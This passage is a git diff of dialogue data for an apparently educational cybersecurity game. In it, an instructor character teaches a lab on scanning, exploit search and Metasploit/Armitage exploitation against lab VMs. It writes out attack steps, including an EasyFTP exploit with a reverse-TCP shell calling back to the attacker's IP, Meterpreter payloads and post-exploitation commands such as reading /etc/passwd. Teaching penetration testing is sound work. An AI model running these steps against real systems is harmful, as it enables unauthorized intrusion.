diff --git a/scenarios/lab_exploitation/ink/instructor.json b/scenarios/lab_exploitation/ink/instructor.json
index 058e35e..fc80b71 100644
--- a/scenarios/lab_exploitation/ink/instructor.json
+++ b/scenarios/lab_exploitation/ink/instructor.json
@@ -1 +1 @@ -{"inkVersion":21,"root":[[["done",{"#n":"g-0"}],null],"done",{"start":["ev",0,"/ev",{"VAR=":"instructor_rapport","re":true},"ev",0,"/ev",{"VAR=":"exploitation_mastery","re":true},"^Welcome back, ","ev",{"VAR?":"player_name"},"out","/ev","^. What would you like to discuss?","\n",{"->":"exploitation_hub"},null],"intro_timed":["ev",0,"/ev",{"VAR=":"instructor_rapport","re":true},"ev",0,"/ev",{"VAR=":"exploitation_mastery","re":true},"^Welcome to From Scanning to Exploitation, ","ev",{"VAR?":"player_name"},"out","/ev","^. I'm your exploitation specialist instructor for this session.","\n","^This lab brings together everything you've learned so far - scanning, vulnerability research, and exploitation. You'll learn how to move from network scanning to identifying vulnerabilities, searching for exploits, and ultimately gaining control of target systems.","\n","^We'll use both Metasploit console and Armitage, a graphical interface that can automate parts of the hacking process.","\n","^Remember: this knowledge is for authorized penetration testing and defensive security only.","\n","ev",{"VAR?":"exploitation_mastery"},10,"+",{"VAR=":"exploitation_mastery","re":true},"/ev","#","^influence_increased","/#","^Let me explain how this lab works. You'll find three key resources here:","\n","^First, there's a Lab Sheet Workstation in this room. This gives you access to detailed written instructions and exercises that complement our conversation. Use it to follow along with the material.","\n","^Second, in the VM lab room to the north, you'll find terminals to launch virtual machines. You'll work with a Kali Linux attacker machine, a Windows server, and a Linux server for hands-on exploitation practice.","\n","^Finally, there's a Flag Submission Terminal where you'll submit flags you capture during the exercises. 
These flags demonstrate that you've successfully completed the challenges.","\n","^You can talk to me anytime to explore exploitation concepts, get tips, or ask questions about the material. I'm here to help guide your learning.","\n","^Ready to get started? Feel free to ask me about any topic, or head to the lab sheet workstation and VM room when you're ready to begin the practical exercises.","\n",{"->":"exploitation_hub"},null],"exploitation_hub":[["^What aspect of exploitation would you like to explore?","\n","ev","str","^Why combine scanning and exploitation?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Scanning targets with Nmap","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Metasploit database and scan import","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^Running scans from within msfconsole","/str","/ev",{"*":".^.c-3","flg":4},"ev","str","^Searching for Metasploit exploits","/str","/ev",{"*":".^.c-4","flg":4},"ev","str","^Launching Metasploit exploits","/str","/ev",{"*":".^.c-5","flg":4},"ev","str","^Introduction to Armitage","/str","/ev",{"*":".^.c-6","flg":4},"ev","str","^Using Armitage for automated hacking","/str","/ev",{"*":".^.c-7","flg":4},"ev","str","^Vulnerability databases and research","/str","/ev",{"*":".^.c-8","flg":4},"ev","str","^The Exploit Database and searchsploit","/str","/ev",{"*":".^.c-9","flg":4},"ev","str","^Show me the commands reference","/str","/ev",{"*":".^.c-10","flg":4},"ev","str","^Practical challenge tips","/str","/ev",{"*":".^.c-11","flg":4},"ev","str","^I'm ready for the lab exercises","/str","/ev",{"*":".^.c-12","flg":4},"ev","str","^That's all for 
now","/str","/ev",{"*":".^.c-13","flg":4},{"c-0":["\n",{"->":"scanning_to_exploitation"},null],"c-1":["\n",{"->":"nmap_scanning"},null],"c-2":["\n",{"->":"metasploit_database"},null],"c-3":["\n",{"->":"msfconsole_scanning"},null],"c-4":["\n",{"->":"searching_exploits"},null],"c-5":["\n",{"->":"launching_exploits"},null],"c-6":["\n",{"->":"armitage_intro"},null],"c-7":["\n",{"->":"armitage_usage"},null],"c-8":["\n",{"->":"vulnerability_databases"},null],"c-9":["\n",{"->":"exploit_db"},null],"c-10":["\n",{"->":"commands_reference"},null],"c-11":["\n",{"->":"challenge_tips"},null],"c-12":["\n",{"->":"ready_for_practice"},null],"c-13":["\n","#","^exit_conversation","/#","end",null]}],null],"scanning_to_exploitation":[["^After gathering information about a target through footprinting and scanning, you need to know what attacks will work.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^The key questions are: Where will you find vulnerability information? How will you use that information to launch an attack? How can security professionals use this to test system security?","\n","^Once you know the operating system and software running on a system, you can refer to your own knowledge of known vulnerabilities, or search online databases for more extensive information.","\n","ev","str","^What makes a target exploitable?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I know what attacks will work?","/str","/ev",{"*":".^.c-1","flg":4},{"c-0":["\n","^A target is exploitable when it's running vulnerable software that you have an exploit for.","\n","^For example, if a target is running an old version of Windows with known vulnerabilities, there are numerous exploits that could give you full control of the system.","\n","^The scanning phase reveals what's running. The vulnerability research phase identifies what's vulnerable. 
The exploitation phase is when you actually attack.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^This is where vulnerability databases and exploit frameworks like Metasploit come in.","\n","^After scanning reveals \"Windows 2000 with EasyFTP 1.7.0.11,\" you can search for known vulnerabilities in those specific versions.","\n","^Metasploit has over a thousand exploits built in. You can search them by platform, service name, or CVE number.","\n","^We'll also look at external databases like CVE Details, NVD, and Exploit DB.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"nmap_scanning":[["^The first step is thorough scanning to identify your targets and what they're running.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^For this lab, you'll scan your network to find two vulnerable servers - one Linux and one Windows.","\n","^A comprehensive scan would be: nmap -sV 10.X.X.2-3","\n","^Where X.X are the second and third octets of your Kali VM's IP address.","\n","ev","str","^What should I look for in the scan results?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^What if the scan takes too long?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What if nmap shows ftp with a question mark?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Pay attention to several key pieces of information:","\n","^First, the IP addresses - which host is Linux and which is Windows?","\n","^Second, what services are running - HTTP, FTP, SSH, IRC?","\n","^Third, and most importantly, what specific software versions are running. 
For example: \"vsftpd 2.3.4\" or \"EasyFTP 1.7.0.11\"","\n","^Those specific version numbers are critical for finding applicable exploits.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Windows scans can take several minutes to complete - this is normal.","\n","^If you want faster results, you can skip OS detection or scan fewer ports.","\n","^However, for thorough penetration testing, patience is important. You don't want to miss a vulnerable service on an unusual port.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^If you see \"ftp?\" in the results, it means Nmap isn't confident about the service identification.","\n","^This can happen if the service is slow to respond or behaving unusually.","\n","^Try restarting the Windows server and scanning again. The service should respond properly after a fresh start.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"metasploit_database":[["^Metasploit includes a PostgreSQL database that stores information about hosts, services, and vulnerabilities.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^This database integration is extremely powerful - it lets you import scan results and automatically target vulnerable services.","\n","^Before using the database, you need to initialize it and start PostgreSQL.","\n","ev","str","^How do I initialize the Metasploit database?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I import Nmap scan results?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What can I do with the 
database?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^First, reinitialize the database: sudo msfdb reinit","\n","^Then start PostgreSQL: sudo service postgresql start","\n","^These commands set up the database that Metasploit will use to store scan results and track compromised hosts.","\n","^You only need to do this once per session, or after restarting your Kali VM.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^If you've saved Nmap results in XML format, you can import them:","\n","^From msfconsole, run: db_import scan_output.xml","\n","^Metasploit will parse the XML and populate the database with host and service information.","\n","^You can then query this data with commands like \"hosts\" and \"services\"","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Once data is in the database, you can query it intelligently:","\n","^\"hosts\" shows all discovered hosts and their operating systems.","\n","^\"services\" shows all discovered services across all hosts.","\n","^\"services -p 21\" shows only services on port 21 (FTP).","\n","^\"services -p 21 -R\" does the same AND automatically sets RHOSTS to target those services!","\n","^This integration makes targeting much more efficient.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"msfconsole_scanning":[["^You can run scans directly from within msfconsole - you don't always need a separate terminal.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^Msfconsole can run Bash commands, so you can run Nmap directly: msf > nmap -O -sV TARGET","\n","^Even better, you 
can use db_nmap which scans AND automatically imports results into the database.","\n","ev","str","^What's the difference between nmap and db_nmap?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Does Metasploit have its own scanners?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^How do I use Metasploit's port scanner?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^When you run \"nmap\" from msfconsole, it just executes Nmap normally. You'd need to manually import the results.","\n","^When you run \"db_nmap\", it does the same scan BUT automatically imports results into the Metasploit database.","\n","^For example: msf > db_nmap -O -sV -p 1-65535 TARGET","\n","^This scans all ports with OS and version detection, and the results are immediately available via \"hosts\" and \"services\"","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Yes! Metasploit has various port scanning modules, though they're not as feature-complete as Nmap.","\n","^You can see them with: use auxiliary/scanner/portscan/ (then press TAB)","\n","^For a basic TCP connect scan: use auxiliary/scanner/portscan/tcp","\n","^These modules integrate directly with the database and can use multiple threads for faster scanning.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^First, select the module: use auxiliary/scanner/portscan/tcp","\n","^Set the target: set RHOSTS TARGET_IP","\n","^Optionally speed it up: set THREADS 10","\n","^Then run it: run","\n","^Results are automatically stored in the database. 
You can verify with the \"services\" command.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"searching_exploits":[["^Metasploit's search command is incredibly powerful for finding relevant exploits.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^You can search by platform, service name, CVE number, exploit type, and more.","\n","^The basic syntax is: search ","\n","^But you can be much more specific with search operators.","\n","ev","str","^What search operators are available?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I search for specific software?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Give me some search examples","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Here are the main search operators:","\n","^type: - Specify module type (exploit, auxiliary, post)","\n","^platform: - Specify platform (Windows, Linux, etc.)","\n","^cve: - Search by CVE number","\n","^name: - Search module names","\n","^For example: search type:exploit platform:Windows","\n","^Or: search type:exploit cve:2003-0352","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Simply include the software name in the search:","\n","^search easyftp","\n","^search vsftpd","\n","^search unreal","\n","^Metasploit will search module names, descriptions, and references for matches.","\n","^Look through the results for modules that match your target's version number.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Sure! 
Here are useful searches:","\n","^search type:exploit platform:linux","\n","^search type:exploit cve:2018","\n","^search buffer overflow","\n","^search type:exploit platform:Windows XP","\n","^search IRC (to find IRC server exploits)","\n","^Once you find a promising module, use \"info exploit/path/to/module\" to learn more about it.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"launching_exploits":[["^Once you've identified the right exploit module, launching it follows a standard workflow.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^The process is: select the module, configure options, choose a payload, and launch the attack.","\n","^Let's walk through a typical exploitation scenario.","\n","ev","str","^Walk me through exploiting EasyFTP","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^What payloads should I use?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What if the exploit doesn't work?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^What can I do once I have a shell?","/str","/ev",{"*":".^.c-3","flg":4},{"c-0":["\n","^Let me guide you through the complete process:","\n","^First, select the exploit: use exploit/windows/ftp/easyftp_cwd_fixret","\n","^Check required options: show options","\n","^Set the target: set RHOST TARGET_IP","\n","^Choose a payload: set PAYLOAD windows/shell/reverse_tcp","\n","^Set your IP for the reverse shell: set LHOST YOUR_KALI_IP","\n","^Optionally check if it's vulnerable: check (though most don't support this)","\n","^Launch the attack: exploit","\n","^If successful, you'll get a shell on the target!","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^The payload depends on what you 
want to achieve and what the exploit supports.","\n","^You can see compatible payloads with: show payloads","\n","^For Windows targets, common choices include:","\n","^windows/shell/reverse_tcp - Basic command shell","\n","^windows/meterpreter/reverse_tcp - Powerful Meterpreter shell with advanced features","\n","^For Linux targets:","\n","^cmd/unix/reverse - Simple Unix shell","\n","^linux/x86/meterpreter/reverse_tcp - Meterpreter for Linux","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^First, run \"show options\" and verify all settings, especially IP addresses.","\n","^Make sure you're using the correct IP - YOUR Kali IP for LHOST, and the TARGET IP for RHOST.","\n","^Try restarting the target VM - sometimes services crash after failed exploit attempts.","\n","^Verify the target is actually running the vulnerable software at that version.","\n","^Some exploits are unreliable and may need multiple attempts.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^With a Windows shell, you can run commands like:","\n","^dir C: (list files)","\n","^net user (list user accounts)","\n","^whoami (check your privileges)","\n","^For Linux shells:","\n","^ls -la (list files)","\n","^cat /etc/passwd (view user accounts)","\n","^whoami (check current user)","\n","^We'll cover post-exploitation in more depth in later labs.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"armitage_intro":[["^Armitage is a free and open source graphical interface for Metasploit with powerful automation 
features.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^It was created to make Metasploit more accessible and to automate repetitive tasks in penetration testing.","\n","^Armitage can scan networks, automatically suggest attacks, and visualize compromised systems.","\n","ev","str","^How is Armitage different from msfconsole?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I start Armitage?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What does the Armitage interface show?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Msfconsole is a command-line interface that gives you complete control and flexibility.","\n","^Armitage provides a graphical interface that visualizes the network and automates finding attacks.","\n","^Armitage can look at scan results and automatically suggest which exploits might work against each target.","\n","^It's particularly useful for beginners or when you want to quickly test multiple targets.","\n","^However, experienced penetration testers often prefer msfconsole for its power and speed.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^First, initialize the Metasploit database if you haven't already:","\n","^sudo msfdb reinit","\n","^sudo service postgresql start","\n","^Then start Armitage: armitage &","\n","^The & runs it in the background so you can continue using your terminal.","\n","^Leave the connection options as default and click \"Connect\"","\n","^If prompted, allow Armitage to start the Metasploit RPC server.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Armitage displays a visual network map showing discovered hosts.","\n","^Each host is represented by an icon - the icon shows the detected operating 
system.","\n","^Compromised systems are shown in red with lightning bolts.","\n","^You can right-click hosts to see suggested attacks, launch exploits, or interact with shells.","\n","^The interface makes it easy to see the big picture of a network and what you've compromised.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"armitage_usage":[["^Let me walk you through using Armitage to scan and exploit targets.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^Armitage integrates scanning, vulnerability analysis, and exploitation into a streamlined workflow.","\n","ev","str","^How do I scan with Armitage?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How does Armitage suggest attacks?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^How do I launch an attack in Armitage?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^How do I interact with a compromised system?","/str","/ev",{"*":".^.c-3","flg":4},{"c-0":["\n","^Click the \"Hosts\" menu, select \"Nmap Scan\", then choose a scan type.","\n","^\"Quick Scan (OS detect)\" is a good starting point: nmap -O -sV TARGET","\n","^Enter the IP address to scan and Armitage will run Nmap.","\n","^Results are automatically imported into the Metasploit database and displayed visually.","\n","^Any previously scanned hosts in the database will also appear automatically.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Armitage analyzes the operating system and services detected on each host.","\n","^First, set the exploit rank to include more options: Armitage menu → Set Exploit Rank → Poor","\n","^Then click: Attacks → Find attacks","\n","^Armitage will match detected services to available 
exploits in Metasploit.","\n","^Right-click a host and select \"Attack\" to see suggested exploits categorized by service.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Right-click the target host and select \"Attack\"","\n","^Navigate through the menu to find the exploit - for example: ftp → easyftp_cwd_fixret","\n","^Click \"Launch\" and Armitage will configure and run the exploit.","\n","^If successful, the host icon turns red showing it's compromised!","\n","^You can then right-click the compromised host to interact with shells or run post-exploitation modules.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^Right-click the compromised (red) host.","\n","^Look for \"Meterpreter 1\" or \"Shell 1\" depending on the payload used.","\n","^Click \"Interact\" → \"Command shell\" to open a terminal.","\n","^You can now run commands like \"dir\" on Windows or \"ls\" on Linux.","\n","^Armitage also has menu options for common post-exploitation tasks.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"vulnerability_databases":[["^Beyond Metasploit, there are numerous online vulnerability databases you should know about.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^These databases provide detailed information about known vulnerabilities, even if exploits aren't publicly available.","\n","^Different databases have different focuses and information, so it's worth checking multiple sources.","\n","ev","str","^What are the main vulnerability databases?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^What information do 
these databases provide?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Do all vulnerabilities have CVEs?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Here are the most important ones:","\n","^CVE Details (cvedetails.com) - Searchable CVE database with statistics and visualizations.","\n","^NVD (nvd.nist.gov/vuln/search) - National Vulnerability Database, the official US government repository.","\n","^SecurityFocus (securityfocus.com/bid) - Bugtraq ID database with discussion forums.","\n","^Packet Storm Security (packetstormsecurity.com) - Security tools, exploits, and advisories.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Vulnerability databases typically include:","\n","^CVE numbers - unique identifiers for each vulnerability.","\n","^Severity scores (CVSS) - numerical ratings of how serious the vulnerability is.","\n","^Affected versions - which specific software versions are vulnerable.","\n","^Technical descriptions of the vulnerability.","\n","^References to patches, advisories, and sometimes proof-of-concept code.","\n","^Information about whether exploits exist in the wild.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^No! 
This is an important point.","\n","^CVE and NVD list officially registered security vulnerabilities, but not all possible vulnerabilities are necessarily registered and assigned CVEs.","\n","^Sometimes researchers publish vulnerabilities before CVEs are assigned.","\n","^Some vendors have their own vulnerability identifiers.","\n","^Zero-day vulnerabilities (unknown to vendors) obviously won't have CVEs yet.","\n","^This is why checking multiple sources and forums is important.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"exploit_db":[["^The Exploit Database (Exploit-DB) is an extensive database focused on vulnerabilities with working exploits.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^It's maintained by Offensive Security (the makers of Kali Linux) and contains thousands of exploits with source code.","\n","^Kali Linux includes a local copy of the entire database!","\n","ev","str","^How do I search Exploit-DB online?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I use the local Exploit-DB copy?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What's searchsploit?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^How do I use standalone exploits from Exploit-DB?","/str","/ev",{"*":".^.c-3","flg":4},{"c-0":["\n","^Visit exploit-db.com and use their search function.","\n","^You can search by software name, version, platform, or exploit type.","\n","^Each exploit listing includes the source code, often in Python, C, PHP, or other languages.","\n","^The database also categorizes exploits by type: remote, local, web application, DoS, etc.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^On Kali Linux, exploits are 
stored in /usr/share/exploitdb/","\n","^They're organized by platform: windows, linux, osx, etc.","\n","^You can list Windows exploits with: find /usr/share/exploitdb/exploits/windows then pipe to less","\n","^There's also an index file with descriptions: less /usr/share/exploitdb/files_exploits.csv","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Searchsploit is a command-line tool for searching the local Exploit-DB copy.","\n","^It's much faster and more convenient than manually searching files.","\n","^Basic usage: searchsploit easyftp","\n","^You can also use grep on the CSV file: grep -i \"EasyFTP\" /usr/share/exploitdb/files_exploits.csv","\n","^To download an exploit to your current directory: searchsploit -m windows/remote/11539.py","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^Standalone exploits often require some manual setup:","\n","^You might need to edit the source code to set the target IP address.","\n","^Some exploits require compilation (C/C++ code).","\n","^Python exploits might need specific library dependencies.","\n","^Read the exploit code comments carefully - they usually explain how to use it.","\n","^Always understand what an exploit does before running it!","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"commands_reference":[["^Let me provide a comprehensive commands reference for this lab.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",[["ev",{"^->":"commands_reference.0.11.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Initial 
Scanning:**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.11.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Metasploit Database Setup:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.11.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^nmap -sV 10.X.X.2-3 (scan for two servers)","\n","^nmap -O -sV -p 1-65535 TARGET (comprehensive scan)","\n",{"->":".^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.11.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^sudo msfdb reinit","\n","^sudo service postgresql start","\n","^msfconsole (start Metasploit console)","\n",{"->":".^.^.^.g-0"},{"#f":5}]}],"ev","str","^Show me scanning from msfconsole","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Show me Metasploit scanning modules","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Show me searching for exploits","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^Show me launching exploits","/str","/ev",{"*":".^.c-3","flg":4},"ev","str","^Show me post-exploitation commands","/str","/ev",{"*":".^.c-4","flg":4},"ev","str","^Show me Armitage commands","/str","/ev",{"*":".^.c-5","flg":4},"ev","str","^Show me Exploit-DB commands","/str","/ev",{"*":".^.c-6","flg":4},{"c-0":["\n",[["ev",{"^->":"commands_reference.0.c-0.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Scanning from Msfconsole:**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.c-0.1.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Database Queries:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-0.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > nmap -O -sV TARGET","\n","^msf > db_nmap -O -sV -p 1-65535 TARGET","\n","^msf > db_import 
scan_output.xml","\n",{"->":".^.^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.c-0.1.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^msf > hosts (show all hosts)","\n","^msf > services (show all services)","\n","^msf > services -p 21 (show services on port 21)","\n","^msf > services -p 21 -R (and set RHOSTS)","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-1":["\n",[["ev",{"^->":"commands_reference.0.c-1.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Metasploit Port Scanners:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-1.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > use auxiliary/scanner/portscan/ (TAB to see options)","\n","^msf > use auxiliary/scanner/portscan/tcp","\n","^msf auxiliary(tcp) > set RHOSTS TARGET","\n","^msf auxiliary(tcp) > set THREADS 10","\n","^msf auxiliary(tcp) > run","\n","^msf auxiliary(tcp) > services","\n","^msf auxiliary(tcp) > 